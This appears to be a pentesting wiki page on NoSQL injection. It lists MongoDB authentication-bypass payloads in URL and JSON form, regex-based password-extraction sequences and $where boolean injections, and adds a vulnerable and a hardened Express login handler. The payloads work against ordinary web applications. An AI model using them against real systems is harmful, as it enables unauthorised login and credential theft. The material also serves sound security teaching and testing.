# NoSQL Injection

## Theory

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

## Practice

#### Authentication Bypass

{% tabs %}
{% tab title="URL" %}
Using the not-equal (`$ne`) or greater-than (`$gt`) operators, we can try to bypass authentication.

```bash
username[$ne]=toto&password[$ne]=toto          #Not Equal
username[$regex]=.*&password[$regex]=.*        #Regex
username[$exists]=true&password[$exists]=true  #Exists
username[$ne]=admin&password[$gt]=0            #Greater
```

{% endtab %}

{% tab title="JSON" %}
Using the not-equal (`$ne`) or greater-than (`$gt`) operators, we can try to bypass authentication.

```bash
{"username": {"$ne": null}, "password": {"$ne": null} }             #Not Equal
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }           #Not Equal
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }   #Greater
```

{% endtab %}
{% endtabs %}

#### Extract data

{% tabs %}
{% tab title="URL" %}
We can use a regex to find the length of a value.

```bash
username[$regex]=.{25}&pass[$ne]=1
```

We can use regex to extract information.

```bash
username[$eq]=admin&password[$regex]=^p
username[$eq]=admin&password[$regex]=^pa
username[$eq]=admin&password[$regex]=^pas

username[$ne]=toto&password[$regex]=^p
username[$ne]=toto&password[$regex]=^pa
username[$ne]=toto&password[$regex]=^pas
```

We can use `$nin` (not in) to exclude some values from the match.

```bash
# Matches none of the values in the array (neither admin nor test).
# The empty brackets make the body parser build an array, which $nin requires.
username[$nin][]=admin&username[$nin][]=test&password[$regex]=^p
```

{% endtab %}

{% tab title="JSON" %}
We can use a regex to find the length of a value.

```bash
{"username": {"$eq": "admin"}, "password": {"$regex": ".{25}" }}
```

We can use regex to extract information.

```bash
{"username": {"$eq": "admin"}, "password": {"$regex": "^p" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^pa" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^pas" }}
```

We can use `$nin` (not in) to exclude some values from the match.

```bash
# Matches none of the values in the array (neither admin nor test).
# Both operators go in one "username" object; a duplicate key would be overwritten.
{"username": {"$nin": ["admin", "test"], "$regex": "^user"}, "password": {"$ne": "1"}}
```

{% endtab %}
{% endtabs %}
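The bypass and extraction payloads above only work because the login handler passes the parsed request body straight to the driver. The following added example (not from the original page or from the referenced projects) shows a minimal vulnerable Express-style handler next to a hardened one that enforces string types; the `users` collection and the small in-memory matcher emulating the operators on this page are constructed so it runs without MongoDB.

```javascript
// Added example (not from the original page): why the payloads above work and
// how to close the hole. A small in-memory matcher stands in for MongoDB's
// handling of $eq, $ne, $gt, $regex, $exists and $nin so this runs offline.

// Constructed sample collection (hypothetical credentials).
const users = [{ username: 'admin', password: 'pa55w0rd' }];

// Emulates MongoDB matching of one field against a literal or an operator object.
function fieldMatches(value, cond) {
  if (cond === null || typeof cond !== 'object') return value === cond;
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case '$eq': return value === arg;
      case '$ne': return value !== arg;
      case '$gt': return value > arg;
      case '$regex': return typeof value === 'string' && new RegExp(arg).test(value);
      case '$exists': return (value !== undefined) === (arg === true || arg === 'true');
      case '$nin': return !Object.values(arg).includes(value);
      default: return false; // unknown operator: no match
    }
  });
}

function findOne(query) {
  const hit = users.find(u => Object.entries(query).every(([k, c]) => fieldMatches(u[k], c)));
  return hit === undefined ? null : hit;
}

// Vulnerable handler: the parsed body goes straight into the query. With
// express.urlencoded({ extended: true }) or a JSON body, username[$ne]=toto
// arrives as { username: { $ne: 'toto' } } and is interpreted as an operator.
function loginVulnerable(body) {
  return findOne({ username: body.username, password: body.password }) !== null;
}

// Hardened handler: credentials must be plain strings. Objects, and therefore
// any $-operator, are rejected before a query is built, and the explicit $eq
// makes the intended comparison unambiguous in the query itself.
function loginHardened(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') return false;
  return findOne({ username: { $eq: username }, password: { $eq: password } }) !== null;
}
```

Rejecting non-string credentials at the boundary also makes the attempt visible: log the type mismatch and alert on it, since legitimate clients never send an object as a password.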

#### MongoDB Injection

{% tabs %}
{% tab title="Payloads" %}
You can try boolean-based injection on MongoDB with the following payloads:

```
, $where: '1 == 1'
$where: '1 == 1'
' || 1==1//
' || 1==1%00
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#extract-length-information" %}
